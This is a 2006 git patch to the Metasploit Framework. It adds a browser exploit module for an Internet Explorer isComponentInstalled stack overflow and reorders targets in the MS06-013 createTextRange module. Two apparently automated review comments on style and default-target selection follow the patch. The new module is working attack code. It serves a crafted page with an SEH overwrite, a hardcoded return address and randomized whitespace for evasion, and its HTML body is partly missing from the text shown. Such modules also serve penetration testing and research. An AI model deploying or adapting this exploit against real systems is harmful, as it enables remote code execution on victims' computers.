From b2fbf8eb547f22cf9c2af618dd879d388cba5c0f Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sun, 17 Dec 2006 08:03:43 +0000
Subject: [PATCH] Addition of the isComponentInstalled() exploit and updates to the createTextRange() module
git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/ie_iscomponentinstalled.rb | 105 ++++++++++++++++++
 .../browser/ms06_013_createtextrange.rb | 3 +-
 2 files changed, 107 insertions(+), 1 deletion(-)
 create mode 100644 modules/exploits/windows/browser/ie_iscomponentinstalled.rb
diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
new file mode 100644
index 0000000000..aeeff86d09
--- /dev/null
+++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
@@ -0,0 +1,105 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
+
+ include Exploit::Seh
+ include Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Internet Explorer isComponentInstalled Overflow',
+ 'Description' => %q{
+ This module exploits a stack overflow in Internet Explorer. This bug was
+ patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hdm',
+ ],
+ 'Version' => '$Revision: 3783 $',
+ 'References' =>
+ [
+ [ 'BID', '16870' ],
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 512,
+ 'BadChars' => "\x00\x5c\x0a\x0d\x22",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' => 0x71ab8e4a } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 24 2006'))
+ end
+
+ def autofilter
+ false
+ end
+
+ def on_request_uri(cli, request)
+
+ # Re-generate the payload
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ # Create the overflow string
+ pattern = Rex::Text.rand_text_alpha(8192)
+
+ # Smash the return address with a bogus pointer
+ pattern[744, 4] = [0xffffffff].pack('V')
+
+ # Handle the exception :-)
+ seh = generate_seh_payload(target.ret)
+ pattern[6439, seh.length] = seh
+
+
+ # Build out the HTML response page
+ var_client = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_html = Rex::Text.rand_text_alpha(rand(30)+2)
+
+ content = %Q|
+
+
+
+
+ #{var_html}
+
+
+ |
+
+ # Randomize the whitespace in the document
+ content.gsub!(/\s+/) do |s|
+ len = rand(100)+2
+ set = "\x09\x20\x0d\x0a"
+ buf = ''
+
+ while (buf.length < len)
+ buf << set[rand(set.length)].chr
+ end
+
+ buf
+ end
+
+ # Insert the shellcode
+ content.gsub!('__pattern__', pattern)
+
+ print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+ # Transmit the response to the client
+ send_response_html(cli, content)
+ end
+
+end
+
+end
diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
index 2ab3baea97..ca5f3c3b9d 100644
--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@@ -48,8 +48,9 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
 [ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
+ [ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
+ ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Mar 19 2006'))
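Review bot: In on_request_uri the value assigned to `p` by `return if ((p = regenerate_payload(cli)) == nil)` is never read in the lines visible here, so the guard reads more naturally as `return if regenerate_payload(cli).nil?`; the body of the `%Q|...|` literal is only partially present in this extraction (the hunk header announces 105 lines but fewer appear), so if `p` is interpolated there the assignment should stay. The `request` parameter and the `s` block parameter of `content.gsub!(/\s+/) do |s|` are likewise unused and could be written `_request` and `|_s|` to say so. `rand(30)+2` and `rand(100)+2` should carry spaces around the operator to match the spacing used elsewhere in the file.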
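Review bot: Moving the IE 7 entry below the IE 6 entry changes what `'DefaultTarget' => 0` selects: before this hunk index 0 was 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', after it index 0 is 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', and the commit message ("updates to the createTextRange() module") does not say the default was meant to change. Either state that intent in the message or keep the previous default with `'DefaultTarget' => 1`. The added `],` closes the Targets array; no closing bracket is visible on the old side, but the header counts one more line per side than appears here, so a context line may have been lost in this extraction. The `update_info` call this hunk sits in starts outside the hunk.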